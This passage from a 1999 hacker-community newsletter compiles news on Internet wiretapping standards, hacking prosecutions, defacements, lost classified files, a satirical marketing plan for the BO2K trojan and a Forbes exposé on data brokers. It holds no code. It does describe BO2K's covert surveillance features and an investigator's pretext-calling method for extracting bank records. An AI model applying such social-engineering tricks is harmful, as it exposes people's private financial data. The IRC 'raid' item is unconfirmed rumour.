While that may seem definitive, Bradner stressed that the issue remains open. "The IETF doesn't vote; we work on rough consensus," said Bradner, who stressed that without a large majority -- say, 80 percent -- of its members voting one way, the issue would not be resolved.

"After the meeting, we are still in somewhat of an ambiguous area," he said. "There is clearly not strong support for doing it, but there is not strong enough support to definitively block wiretapping from future standards."

That leaves the issue tabled for the moment, but certain to be brought up again. "This is just the beginning," said Jim Dempsey, senior staff counsel with the policy think tank Center for Democracy and Technology, who attended the meeting. "The vote was about 10 to 1 against, but that won't stop it."

Expanding wire-tapping

The whole Internet wiretapping concept is a direct result of the Communications Assistance for Law Enforcement Act of 1994, which requires telecommunications companies to aid law enforcement in legally obtained wiretaps by making their network infrastructure wiretap-friendly. For the past two years, law enforcement officials have been lobbying Congress and putting pressure on cellular phone companies to apply the law to their phone network as well. The Internet is the next communications network on the list.

"If it is a one or a zero, or an analog signal, the government is entitled to intercept the signal," said CDT's Dempsey. "But does that mean they can force companies to design their systems to make it easy to get the signals they want, when they want it? That's the CALEA question."

Privacy advocates such as the Electronic Privacy Information Center spoke out adamantly against a pro-wiretapping Internet. "... We believe that such a development would harm network security, result in more illegal activities, diminish users' privacy, stifle innovation, and impose significant costs on developers of communications," wrote EPIC in an open letter to the IETF. "At the same time, it is likely that Internet surveillance protocols would provide little or no real benefit for law enforcement."

Fear of hacking

The IETF answered more out of security concerns than any thoughts about privacy, said Bradner. "If you put in some mechanism where someone with legal authority can tap your telephone, what stops some hacker from doing that?" he asked.

The FBI could not be reached for comment on the issue.

In any event, the whole debate may be moot. The vote just barred specific development of features solely for wiretapping, but other pieces already present in the Internet could be used to create an effective wiretap.

"Some people think that all the functions necessary to do an intercept may already be in the protocol for other reasons," said Bradner. For example, the Internet allows servers to do accounting: Finding out where a packet came from and where it is going. In wiretapping, such a feature is called a pen register and is considered the first step in narrowing down the calls that need to be tapped.

CDT's Dempsey believes the vote may be moot for a different reason. "Two thousand engineers get in a ballroom and raise their hands -- that means nothing to the government," he said. "What it DOES mean is that they will have to go to the CEOs ... and make their case."

@HWA

10.0 Stock Prices Manipulated in China
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

     From HNN http://www.hackernews.com/

     contributed by no0ne
     Zhao Zhe, 28 and a former trust firm employee, received three years of jail time from a Chinese court and was ordered to pay restitution for breaking into a computerized trading system, and manipulating stock data. This allowed the pair to sell shares at higher prices.
     CNNfn
     http://www.cnnfn.com/1999/11/12/emerging_markets/wires/china_hacker_wg/
     Wired
     http://www.wired.com/news/reuters/0,1349,32512,00.html
     Nando Times
     http://www.techserver.com/noframes/story/0,2294,500057111-500094072-500360224-0,00.html

CNNfn;

Chinese hacker jailed
Former trust firm staffer found guilty of hacking into stock system
November 12, 1999: 10:24 a.m. ET

SHANGHAI (Reuters) - A Chinese court jailed a former trust firm worker for three years Friday for hacking into a computerized stock trading system and manipulating prices, a court official said.

The Shanghai court found Zhao Zhe, 28, guilty of rigging stock data so that he could sell shares at inflated prices, he said.

Zhao, a former employee of the Shanghai branch of the Shijiazhuang Trust and Investment Co., was also ordered to pay 2.9 million yuan ($355,200) in compensation for trading losses, had illegal income confiscated and was also fined 10,000 yuan.

"This is a rare case for China," said the court official. "We don't see hackers breaking into stock trading systems very often."

The court found Zhao guilty of breaking into the computer system of the Shanghai branch of a securities company and inflating the prices for Shanghai Xing Ye Real Estate Co. and Henan Lotus Flower Gourmet Powder Co.

Prices of the two companies' domestic shares rose their daily limit of 10 percent in unusually heavy trade as a result of the price manipulation, according to the official media.

The Shanghai stock exchange has said prices in its computerized system were affected by the false information and it has vowed to take steps to strengthen computer security.

-==-

Wired;

Stock Hacker Jailed in China
Reuters
8:00 a.m. 12.Nov.1999 PST

SHANGHAI -- A Chinese court jailed a former trust firm worker for three years on Friday for hacking into a computerized stock trading system and manipulating prices, a court official said.

The Shanghai court found Zhao Zhe, 28, guilty of rigging stock data so that he could sell shares at inflated prices, the official said.

Zhao, a former employee of the Shanghai branch of the Shijiazhuang Trust and Investment Co., was also ordered to pay 2.94 million yuan (US$355,200) in compensation for trading losses, had his illegal income confiscated and was fined an additional 10,000 yuan.

"This is a rare case for China," said the court official. "We don't see hackers breaking into stock trading systems very often."

The court found Zhao guilty of breaking into the computer system of the Shanghai branch of a Hainan securities company and inflating the prices for Shanghai Xing Ye Real Estate Co. and Henan Lotus Flower Gourmet Powder Co.

Prices of the two companies' domestic currency A shares rose their daily limit of 10 percent in unusually heavy trade as a result of the price manipulation, according to the official media.

The Shanghai stock exchange has said prices in its computerized system were affected by the false information and it has vowed to take steps to strengthen computer security.

Copyright 1999 Reuters Limited.

-=-

Nando Times;

China jails hacker for 3 years
Copyright © 1999 Nando Media
Copyright © 1999 Agence France-Presse

BEIJING (November 14, 1999 8:07 a.m. EST http://www.nandotimes.com) - In the first such case in China, a computer hacker convicted of manipulating prices on the Shanghai Securities Exchange was sentenced to three years in prison, state media said Sunday.

Zhao Zhe, a staff member at a securities company, broke into the computer system of the Shanghai Securities Department of the Sanya Zhongya Trust Investment Company and changed five transaction records, the Xinhua news agency said.

He caused the turnover of two stocks to rise drastically and brought about a direct loss of 2.95 million yuan (the equivalent of $355,000), Xinhua said.
The hacker was also fined 10,000 yuan - the equivalent of $1,200.

@HWA

11.0 Rumours: Vent of Level Seven raided by FBI?
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

     This came to light on one of the channels I frequent, it's unconfirmed at this point but looks bad for vent if this is true. Keep in mind people say all sorts of stuff on IRC and it's not all true, although I see no reason for vent to make something like this up - Ed

[12:05] _________________________________________
[12:05] | tnev (vent@ccxxxxxx-a.xxxxxx.xx.home.com)
[12:05] | name : beat cancer, over dose [Level Seven]
[12:05] | chan :
[12:05] | serv : irc.home.com
[12:05] | idle : 8hrs 45mins 40secs
[12:05] heh, im idle too much
[12:05] yea, i got fucking raided
[12:05] i gotta go to court
[12:06] and shit
[12:06] prolly scared straight
[12:06] for everything else i did
[12:07] ...maybe.
[12:07] level seven is surely dead
[12:07] fbi knows about us
[12:07] and they wanna give us 12 yrs for the usembassy hack
[12:07] cause of some 'stolen documents'
[12:08] and because of the message we left
[12:08] on the site
[12:08] 3 days after the actual usembassy bombing

@HWA

12.0 Electronic Information Stolen from Egypt
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

     From HNN http://www.hackernews.com/

     contributed by Evil Wench
     With all the hype about electronic break ins, cyber-intruders, and internet terrorists it is sometimes easy to forget about the physical world. On October 6th of this year Egypt discovered several computer disks had been stolen from the University of Cairo. The disks contained classified information about the country's natural resources such as gold, copper and uranium reserves.

     Nando Times
     http://www.nandotimes.com/technology/story/body/0,1634,500057186-500094173-500360964-0,00.html

Secrets about Egypt's natural resources stolen
Copyright © 1999 Nando Media
Copyright © 1999 Agence France-Presse

CAIRO (November 14, 1999 12:10 p.m. EST http://www.nandotimes.com) - Egyptian police are investigating the Oct. 6 theft from Cairo University of dozens of computer disks containing classified information about the African nation's natural resources, university security officials disclosed Sunday.

University employees, including members of the geography department, are being questioned about the theft, which took place more than a month ago, but the officials said the investigation had not yet yielded any results.

The disks contain information on the location of oil, gas and uranium fields as well as gold and copper deposits and other classified geographical information, university sources said.

The pro-government Al-Ahram newspaper reported that the disks also contained the results of all Egyptian geographical studies carried out over the past two centuries.

It was not clear if the disks contained the only copies of the information or why the Oct. 6 crime has not been publicized before now.

In early 1998, Egypt had oil and gas reserves of 1,090 million oil equivalent tons, according to oil ministry sources. No figures were available for gold and uranium reserves.

@HWA

13.0 Aleph One Gives NPR Interview
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

     From HNN http://www.hackernews.com/

     contributed by oolong
     Aleph One (Elias Levy), the administrator of the BugTraq mailing list and the CTO of Security Focus.com, was interviewed on National Public Radio on the topic of "Cyber Terrorism" last Friday.

     NPR - archived .ram file of the interview
     http://www.npr.org/ramfiles/me/19991112.me.10.ram

@HWA

14.0 South American Con Announced
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

     From HNN http://www.hackernews.com/

     contributed by Space Rogue
     Whoa, a hacker convention in Bogota, Colombia. It's coming up very soon. Check out Col Con '00.

     HNN Cons Page
     http://www.hackernews.com/cons/cons.html

@HWA

15.0 c
     ~~~~~~~~~~~~~~~~~~~

     From HNN http://www.hackernews.com/

     contributed by Space Rogue
     Issue one of Camarilla, a new zine with articles on computers, networking, telephony, humor and everything in between has been released.

     Camarilla
     http://camarilla.hektik.org

@HWA

16.0 BO2K Marketing Plan (Very funny reading, check this out)
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

     From HNN http://www.hackernews.com/

     contributed by Dildog
     What if Back Orifice 2000 was a commercial product? It would need a marketing plan. Just how would you market BO2K to the masses? Adam Penenberg had 5 top PR firms design a marketing campaign for BO2K, and some of the ideas are pretty wacky.

     Forbes
     http://www.forbes.com/columnists/penenberg/

They sure don't make press agents like James Sterling Moran anymore. The undisputed Master of the Publicity Stunt, Moran, who at 91 recently passed on to that great File-O-Fax in the sky, reeled off a number of Lucy Ricardo-like schemes to sop up media attention in his lifetime. According to his obituary, he once walked a bull through a china shop, sat on an ostrich egg for 19 days until it hatched and looked for a needle in a haystack. But Moran's most inspired plan never got off the ground: Flying a midget over Central Park on a kite. The cops put the kibosh on that, prompting Moran to quip "It's a sad day for American capitalism when a man can't fly a midget on a kite over Central Park."

Some publicists believe stunts like Moran's have gone the way of castor oil, manual typewriters, prohibition and vaudeville, but I think they would go over well today. (Look at Dennis Rodman or John Wayne Bobbit.) With the emergence of the Internet there are now thousands of content-starved media outlets hovering in cyberspace.
With this in mind I decided to ask five top PR firms to design a Moran-like marketing campaign for a decidedly spooky product: Back Orifice 2000 ("BO2K" for short, a not so subtle dig at Microsoft's "Back Office"), a software created by the hacker group Cult of the Dead Cow.

BO2K has many intriguing functions. It can be covertly installed on a victim's hard drive, then used to control the computer from a remote location. That way the nefarious hacker could access your E-mail, pull up your surfing history, rifle through your personal files, trash your system. But wait! There's more! BO2K also serves as a nifty surveillance tool; it can automatically turn on microphones and cameras on victims' computers so you can watch your coworkers without their knowledge.

Another popular remote-access hacker tool called Netbus recently became commercially available, so I decided to price BO2K competitively: $15, the same as Netbus.

Here's what the PR tsars and tsarinas came up with:

Worry warts

A huge revenue upside opportunity could be realized if the Cult of the Dead Cow were to focus on potentially the most lucrative market for its product: the paranoid corporate executive. As most technology products are targeted to specific market categories (with resultant product feature-set tailoring), following is a recommendation for marketing and promotion for this segment:

Product Name: "CEO's Big Brother"

Product Pricing: $15 per employee, plus free tech-support (from a trusted third-party vendor).

Feature set: Basic BO2K with spy attachments.

Market: Allows the busy, perpetually paranoid executive the ability to check on staff on a 24/7 multimedia basis (with remote spy attachments for audio/video). Works equally well with potentially back-stabbing board members and pesky competitors.

Strategy/Implementation: Reach audience with multisite live product launch.

Campaign specifics: Live demonstrations at all airport shuttle terminals (Boston, NY, DC, LA, Orange County, SF) with free 30-day trial disks handed out. Create partnership campaign with large hotel chain (e.g., Hyatt). Product kit with same trial disks handed to all executive business travelers. Commission survey with results that will demonstrate the need for remote monitoring to reinforce product category viability (e.g., "52% of American workers cite their No. 1 use of the Internet at work as a means of looking for another job, while only 10% use computers to increase their productivity..."). Include survey in media kit.

Endorsements: Reach out to high-profile CEOs like Gil Amelio, Mike Ovitz, Ross Perot, for "if only I'd had this product" testimonials. Market beta testers' experience as "management success" stories to key business media publications, pre-launch (timing to hit week of launch).

Post-launch: Have Cult member coauthor book with Donald Trump, tentatively entitled "Art of the Steal," a blueprint for getting competitive data (BO2K) and what to do with it once you've gotten it. Resultant 15-city book tour and TV campaign.

--Michelle Zawrotny, Phase Two Strategies, San Francisco

Go viral

Our plan would appeal to the driving factors that, in some combination, motivate all hackers--the prospect of fame, conquering a challenge, dissing the establishment and earning the respect of their peers. To appropriately brand and market BO2K to a retail audience we would employ a viral marketing campaign (naturally!) to promote and, indeed, exploit various hacker feats.

Under the slogan of "Got Code?" the Cult of the Dead Cow could sponsor a hacker contest to illustrate the uses of Back Orifice most effectively.
The best hackers would be eligible for various prizes, including hacker lifestyle gear (extra-padded chairs, official "Star Trek" paraphernalia), dinner and a movie with Linus Torvalds (the undisputed king of open source technologies), and the grand prize: A live cow presented to the lucky winner at Defcon, the annual hacker convention held in Las Vegas, by the entire Cult of the Dead Cow, dressed in billowing monks robes with hoods.

The publicity for the contest itself would be equally viral: The Cult could hack into web sites (with permission so they don't violate the law, although the public doesn't need to know that) to post its marketing message.

--Jesse Ciccone and Todd Evans of FitzGerald Communications Inc., San Francisco office

"You've got BO!"

Here's a PR recipe for BO2K to get on the straight and narrow: Seize the controversy, play the contrarian, tout a celebrity spokesperson and engage in some reverse engineering. Timing is crucial. Start the campaign in late December. With Y2K only days away, concerns about cyber-terrorism and accidental missile launches will be at a fever pitch.

Members of The Cult of the Dead Cow will rush to the Nation's Capital, wearing white hats. Speaking from an outdoor press conference in a muddy Silicon Swamp, i.e. Washington Mall, they will address officials from the government and private industry and offer to serve as exclusive security consultants to the American government. We'll be sure to spike the audience with business celebrities, lawyers from the Department of Justice's antitrust case against Microsoft and politicians who want to "hip up" their image. In addition, hacker groupies will be paid to sit Indian-style across the Capital police barricades and conduct a computer security vigil.

To erect the long-term campaign, Pamela Anderson Lee, wearing a G-string, will be signed to appear in a rock-video music stream composed and performed by her mercurial mate, Tommy Lee. In a revealing display of BO2K's spy attachments, she and her husband will be "caught" fooling around in private by the BO2K spy cam. When they realize they've been caught, she'll look into the camera and say, "$15 buys you the BO2K software, tickets for two to 'Takedown', the upcoming film about hacker Kevin Mitnick, plus friend and family shares in the Cult's upcoming IPO." Lee will then point proudly to the new tag line pinned on her derrière: "You've got B.O.!"

I expect that within a month downloads will shatter all previous records.

--Marco Greenberg, president of NYPR, New York City

White collar control

If I were hired to come up with a publicity campaign for Back Orifice 2000, I'd pitch the product as the perfect personal security program for the busy executive. Let's face it: Hackers don't have money; it's the enterprise market where they could reap rewards. You have to tailor a message that strikes a chord with high-powered businesspeople. Relate to their experiences, the fact that they spend much of their time on the road--moving important documents from laptop to desktop and back to laptop. Always looking ahead, they sometimes forget to look behind.

I'd make sure they realize that BO2K makes it possible to keep on top of what's happening back at the office--who's in your office, what documents they are reading, what people are saying (You have to love those spy attachments). I'd tell them: As a CEO or CFO, don't you want to know who's reading through your files while you're out raising more venture capital? Wouldn't it be good to know whether anyone was in your office when you weren't there? With BO2K you can find out--and better still for the power-hungry board chairman or CEO--take action.

--Lauren Hackett, account supervisor, Middleberg+Associates, New York City

Operation anthrax

To effectively demonstrate the capabilities of Back Orifice 2000 to journalists, we must have them experience its potential first hand.
We recommend a guerilla media campaign on behalf of the Cult Of The Dead Cow, which we propose to call "Operation anthrax." On a to-be-determined date, our agency and "the Cow" would use BO2K to clandestinely take over the computers of 50 targeted journalists, representing both the print and electronic mediums. Simultaneously, BO2K would pirate the surveillance equipment in Federal Reserve Chairman Alan Greenspan's office and feed the captured video and audio information straight to selected reporters' desktops, giving them total unabridged access to the puppeteer of global finance. (We'll call it "The Greenspan Cam.") Cult members could finish up by discussing BO2K's most powerful assets via video to a captive journalism audience.

If Operation Anthrax doesn't generate the desired amount of media penetration, fear not. We would be glad to use BO2K to control the presses of the top 100 dailies. And isn't that every publicist's dream? To bypass the journalist completely and place our own story anywhere we want (above the fold, naturally).

--Dave Quast, Nicki Gladney and Michael Prichinello of RLM Public Relations, New York City

@HWA

17.0 Canada Loses Classified Documents
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

     From HNN http://www.hackernews.com/

     contributed by William Knowles
     The Canadian Security Intelligence Service has reported the theft of top secret files from the back seat of an agent's car. It is believed that the thieves did not know what they had and just threw the files away. (Hey, let's not forget about physical security.)

     South China Morning Post
     http://www.scmp.com/News/World/Article/FullText_asp_ArticleID-19991115030656052.asp

     Late Update: 1145EST
     This article has a few more details on the above escapade.

     The Toronto Star
     http://www.thestar.ca/thestar/back_issues/ED19991113/news/991113NEW07_NA-SPY13.html

South China Morning Post;

Monday, November 15, 1999
NORTH AMERICA TODAY
Top-secret files stolen from back seat of agent's car
MURRAY CAMPBELL in Toronto

There are red faces all around at Canada's spy organisation after top-secret documents were stolen from the back seat of an agent's car.

In what is being described as the most serious security breach in 20 years, documents outlining the future plans of the Canadian Security Intelligence Service (CSIS) were stolen last month by drug addicts while the agent was watching an ice-hockey game in Toronto.

The thieves were apparently looking for money when they saw a briefcase in the car parked outside the arena where the Toronto Maple Leafs play. And a police investigation has concluded that the sensitive documents were later tossed into a rubbish bin and ended up in a landfill site.

The CSIS, which was formed in 1984, is responsible for counter-intelligence and counter-terrorism efforts in Canada. The agency, which is charged with guarding the Government's deepest secrets, is extremely embarrassed by the lapse.

CSIS officials were trying to play down the importance of the documents, saying they contained no details of intelligence sources or specifics of operations. But an agency official was forced to conclude "we consider the loss of the documents to be a serious matter of national security".

It is not the first time the CSIS has slipped up. Earlier this autumn, there were reports that one of its spooks had posted on the Internet the names and pictures of Canadian fighter pilots who served in the Balkans war. In another incident, a computer disc containing the names of targets of CSIS intelligence probes was found by a member of the public.

"This is simply a debacle," said Jim Abbott, an MP with the opposition Reform Party. "We look like we are in amateur hour."
But even as cartoonists and satirists feasted on the story, there were warnings that Canada's spy agency was now seriously compromised. The country is not a specific target for terrorists but its proximity to the United States and its open access to banking and telecommunications make it attractive to terrorist groups.

-=-

Toronto Star;
http://www.thestar.ca/thestar/back_issues/ED19991113/news/991113NEW07_NA-SPY13.html

Spy agencies launch probe after secret document stolen
By William Walker
Toronto Star Ottawa Bureau Chief

OTTAWA - Twin investigations are under way to ensure that no Canadian Security Intelligence Service officer ever leaves confidential documents sitting in a public place, officials say.

The probes follow an incident last month outside the Air Canada Centre in Toronto where three smash-and-grab artists, described by police as drug addicts, broke into a car and stole a confidential CSIS operational plan.

The first investigation is being conducted internally by CSIS itself, said agency spokesperson Phil Gibson.

``Clearly we don't contemplate employees walking around with these kinds of documents, that's for sure,'' he said in an interview yesterday.

The CSIS officer whose car window was smashed isn't being identified by the agency. The person has not been reprimanded yet, but will be dealt with when the CSIS investigation ends soon, Gibson said.

The second probe involves the civilian Security Intelligence Review Committee (SIRC), a watchdog agency that includes former Ontario premier Bob Rae among its members. That agency has complete access to CSIS personnel and files for the purpose of its investigation and is expected to make a report public which could lead to changes in how such documents are handled in future.

Gibson said the document stolen was an ``annual operational report'' but not the agency's annual report to the solicitor-general.

Asked how detailed the information contained within the document was, Gibson said: ``It was broad.''

CSIS has now concluded the document is irretrievable. It is believed the thieves, who were arrested within days, threw a briefcase containing the papers in a dumpster.

(See? You NEVER know what you'll find in a dumpster these days, bodies, guns, manuals and secret philez heh... - Ed)

@HWA

18.0 Guilty Plea in Media City Defacement
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

     From HNN http://www.hackernews.com/

     contributed by no0ne
     18 year old student Edwin Lim Zhaoming pleaded guilty to 17 charges of breaking into the Mediacity, the Television Corporation of Singapore's website. The teen, who renamed the site "Mediashity" last June 15, will be sentenced at a later date. His accomplice, a 15 year old Myanmar national, was sentenced to 12 months probation and 100 hours of community service.

     The Straits Times
     http://straitstimes.asia1.com.sg/cyb/cyb8_1116.html
     (404: url not found)

@HWA

19.0 Hong Kong's Department of Highways Defaced
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

     From HNN http://www.hackernews.com/

     contributed by no0ne
     The web site of Hong Kong's Department of Highways, which originally offers bilingual information and guides regarding HK's road system, was defaced Friday night. The intruders changed the index page into one with a white background and three lines of quotes from various people.

     Yahoo News
     http://au.dailynews.yahoo.com/headlines/151199/nbtech/942645300-3893108747.html

Monday 15 November 4:55 PM

Hong Kong Highways Department Website Hacked - Update

The director of the Hong Kong Highways Department said that repairs to his department's Website, which was defaced by hackers on Friday night, would have to wait until staff arrived for work on Monday morning.

The Website at http://www.hyd.gov.hk , normally offers bilingual information on Hong Kong's road system including maps, press releases and other information.
But instead of a helping of Hong Kong highway news, visitors to the site found a plain white page with three lines of hacker quotes.

When IT Daily contacted Leung on Saturday for comments on the break-in, he said that he was unaware of the incident and since his office was closed, the matter would have to wait until "first thing Monday morning."

"The homepage is for general information," said Leung. "If it's down for one or two days, it will not be a big impact on the public."

However, the site had been repaired within two hours of Leung's comments.

The Highways Department was not the only official body ignoring online vandalism. On Thursday, a hacker broke into the Chinese Ministry of Foreign Affairs Website, at http://fmprc.gov.cn/ , and replaced its home page with several lines of hacker boasts and obscenities. The defaced site was still online over the weekend.

A day later, on Friday, a Chinese court jailed a hacker for three years for breaking into the computer system of the Shanghai branch of a Hainan securities company and manipulating prices. The former employee of trust firm Shijiazhuang Trust and Investment, Zhao Zhe, 28, was found guilty of changing stock data so he could profit from two share sales at artificially inflated prices.

Meanwhile, officials in Singapore have been taking the issue very seriously. At least two Singapore government Websites were hacked and Web pages altered last week, causing the sites to be taken offline and investigators called in.

The Singapore Government Shopfront, at http://shop.gov.sg , was broken into on Friday, and the Ministry of Law's Integrated Land Information Service (INLIS) Web site, at http://www.inlis.gov.sg , was hacked into last Tuesday. Both sites were quickly taken offline for official investigations. Officials said that no records or data were compromised.

The Singapore Computer Response Team (SingCERT) is assisting in the investigations and the Police have been notified.

"The Ministry of Law takes a serious view of this, as hacking is a serious offense punishable with heavy penalties," said the ministry, in a statement.

In September, a fifteen year old Singapore boy was sentenced to a year's probation and 100 hours community service for hacking into the Television Corporation of Singapore's Website, at http://www.tcs.com.sg , earlier this year. Although the attack took place in June, another TCS Website was hacked shortly after, causing government officials to inform the public that they would not hesitate to punish such offences.

@HWA

20.0 You Have No Privacy Anyway
     ~~~~~~~~~~~~~~~~~~~~~~~~~~

     From HNN http://www.hackernews.com/

     contributed by Adam
     Forbes Magazine hired a private eye to gather all the information he could on one of their reporters. For less than $500 he legally came up with all of the reporter's financial information, unlisted phone numbers, social security number, etc... very terrifying. If you have been wondering what all this privacy hype is about then read this.

     Forbes
     http://www.forbes.com/Forbes/99/1129/6413182a.htm

Our reporter dared a private eye to dig up dirt on him. The results are terrifying to anybody who worries about prying eyes or credit card scamsters. What can you do to protect yourself?

The End of Privacy
By Adam L. Penenberg

The phone rang and a stranger cracked sing-songy at the other end of the line: "Happy Birthday."

That was spooky--the next day I would turn 37. "Your full name is Adam Landis Penenberg," the caller continued. "Landis?" My mother's maiden name. "I'm touched," he said.

Then Daniel Cohn, Web detective, reeled off the rest of my "base identifiers"--my birth date, address in New York, Social Security number. Just two days earlier I had issued Cohn a challenge: Starting with my byline, dig up as much information about me as you can.

"That didn't take long," I said.

"It took about five minutes," Cohn said, cackling back in Boca Raton, Fla. "I'll have the rest within a week."
And the line went dead. In all of six days Dan Cohn and his Web detective agency, Docusearch.com, shattered every notion I had about privacy in this country (or whatever remains of it). Using only a keyboard and the phone, he was able to uncover the innermost details of my life--whom I call late at night; how much money I have in the bank; my salary and rent. He even got my unlisted phone numbers, both of them. Okay, so you've heard it before: America, the country that made "right to privacy" a credo, has lost its privacy to the computer. But it's far worse than you think. Advances in smart data-sifting techniques and the rise of massive databases have conspired to strip you naked. The spread of the Web is the final step. It will make most of the secrets you have more instantly available than ever before, ready to reveal themselves in a few taps on the keyboard. For decades this information rested in remote mainframes that were difficult to access, even for the techies who put it there. The move to desktop PCs and local servers in the 1990s has distributed these data far and wide. Computers now hold half a billion bank accounts, half a billion credit card accounts, hundreds of millions of mortgages and retirement funds and medical claims and more. The Web seamlessly links it all together. As e-commerce grows, marketers and busybodies will crack open a cache of new consumer data more revealing than ever before (see box, p. 188). It will be a salesman's dream--and a paranoid's nightmare. Adding to the paranoia: Hundreds of data sleuths like Dan Cohn of Docusearch have opened up shop on the Web to sell precious pieces of these data. Some are ethical; some aren't. They mine celebrity secrets, spy on business rivals and track down hidden assets, secret lovers and deadbeat dads. They include Strategic Data Service (at datahawk.com) and Infoseekers.com and Dig Dirt Inc. (both at the PI Mall, www.pimall.com). 
Cohn's firm will get a client your unlisted number for $49, your Social Security number for $49 and your bank balances for $45. Your driving record goes for $35; tracing a cell phone number costs $84. Cohn will even tell someone what stocks, bonds and securities you own (for $209). As with computers, the price of information has plunged. You may well ask: What's the big deal? We consumers are as much to blame as marketers for all these loose data. At every turn we have willingly given up a layer of privacy in exchange for convenience; it is why we use a credit card to shop, enduring a barrage of junk mail. Why should we care if our personal information isn't so personal anymore? Well, take this test: Next time you are at a party, tell a stranger your salary, checking account balance, mortgage payment and Social Security number. If this makes you uneasy, you have your answer. "If the post office said we have to use transparent envelopes, people would go crazy, because the fact is we all have something to hide," says Edward Wade, a privacy advocate who wrote Identity Theft: The Cybercrime of the Millennium (Loompanics Unlimited, 1999) under the pseudonym John Q. Newman. You can do a few things about it (see box, p. 186). Give your business to the companies that take extra steps to safeguard your data and will guarantee it. Refuse to reveal your Social Security number--the key for decrypting your privacy--to all but the financial institutions required by law to record it. Do something, because many banks, brokerages, credit card issuers and others are lax, even careless, about locking away your records. They take varied steps in trying to protect your privacy (see box, p. 187). Some sell information to other marketers, and many let hundreds of employees access your data. Some workers, aiming to please, blithely hand out your account number, balance and more whenever someone calls and asks for it. That's how Cohn pierced my privacy.
"You call up a company and make it seem like you're a spy on a covert mission, and only they can help you,"he says. "It works every time. All day long I deal with spy wannabes." I'm not the paranoid type; I don't see a huddle on TV and think that 11 football players are talking about me. But things have gone too far. A stalker would kill for the wealth of information Cohn was able to dig up. A crook could parlay the data into credit card scams and "identity theft," pilfering my good credit rating and using it to pull more ripoffs. Cohn operates in this netherworld of private eyes, ex-spooks and ex-cops, retired military men, accountants and research librarians. Now 39, he grew up in the Philadelphia suburb of Bryn Mawr, attended Penn State and joined the Navy in 1980 for a three-year stint. In 1987 Cohn formed his own agency to investigate insurance fraud and set up shop in Florida. "There was no shortage of work," he says. He invented a "video periscope" that could rise up through the roof of a van to record a target's scam. In 1995 he founded Docusearch with childhood pal KennethZeiss. They fill up to 100 orders a day on the Web, and expect $1 million in business this year. Their clients include lawyers, insurers, private eyes; the Los Angeles Pension Union is a customer, and Citibank's legal recovery department uses Docusearch to find debtors on the run. Cohn, Zeiss and 13 researchers (6 of them licensed P.I.s) work out of the top floor of a dull, five-story office building in Boca Raton, Fla., sitting in cubicles under a fluorescent glare and taking orders from 9 a.m. to 4 p.m. Their Web site is open 24 hours a day, 365 days a year. You click through it and load up an on-line shopping cart as casually as if you were at Amazon.com. The researchers use sharp sifting methods, but Cohn also admits to misrepresenting who he is and what he is after. 
He says the law lets licensed investigators use such tricks as "pretext calling," fooling company employees into divulging customer data over the phone (legal in all but a few states). He even claims to have a government source who provides unpublished numbers for a fee, "and you'll never figure out how he is paid because there's no paper trail." Yet Cohn claims to be more scrupulous than rivals. "Unlike an information broker, I won't break the law. I turn down jobs, like if a jealous boyfriend wants to find out where his ex is living." He also says he won't resell the information to anyone else. Let's hope not. Cohn's first step into my digital domain was to plug my name into the credit bureaus--Transunion, Equifax, Experian. In minutes he had my Social Security number, address and birth date. Credit agencies are supposed to ensure that their subscribers (retailers, auto dealers, banks, mortgage companies) have a legitimate need to check credit. "We physically visit applicants to make sure they live up to our service agreement," says David Mooney of Equifax, which keeps records on 200 million Americans and shares them with 114,000 clients. He says resellers of the data must do the same. "It's rare that anyone abuses the system." But Cohn says he gets his data from a reseller, and no one has ever checked up on him. Armed with my credit header, Dan Cohn tapped other sites. A week after my birthday, true to his word, he faxed me a three-page summary of my life. He had pulled up my utility bills, my two unlisted phone numbers and my finances. This gave him the ability to map my routines, if he had chosen to do so: how much cash I burn in a week ($400), how much I deposit twice a month ($3,061), my favorite neighborhood bistro (the Flea Market Cafe), the $720 monthly checks I write out to one Judith Pekowsky: my psychotherapist. (When you live in New York, you see a shrink; it's the law.) If I had an incurable disease, Cohn could probably find that out, too.
He had my latest phone bill ($108) and a list of long distance calls made from home--including late-night fiber-optic dalliances (which soon ended) with a woman who traveled a lot. Cohn also divined the phone numbers of a few of my sources, underground computer hackers who aren't wanted by the police--but probably should be. Knowing my Social Security number and other personal details helped Cohn get access to a Federal Reserve database that told him where I had deposits. Cohn found accounts I had forgotten long ago: $503 at Apple Bank for Savings in an account held by a long-ago landlord as a security deposit; $7 in a dormant savings account at Chase Manhattan Bank; $1,000 in another Chase account. A few days later Cohn struck the mother lode. He located my cash management account, opened a few months earlier at Merrill Lynch & Co. That gave him a peek at my balance, direct deposits from work, withdrawals, ATM visits, check numbers with dates and amounts, and the name of my broker. That's too much for some privacy hawks. "If someone can call your bank and get them to release account information without your consent, it means you have no privacy," says Russell Smith, director of Consumer.net in Alexandria, Va., who has won more than $40,000 suing telemarketers for bothering him. "The two issues are knowledge and control: You should know what information about you is out there, and you should be able to control who gets it." How did Cohn get hold of my Merrill Lynch secrets? Directly from the source. Cohn says he phoned Merrill Lynch and talked to one of 500 employees who can tap into my data. "Hi, I'm Dan Cohn, a licensed state investigator conducting an investigation of an Adam Penenberg," he told the staffer, knowing the words "licensed" and "state" make it sound like he works for law enforcement.
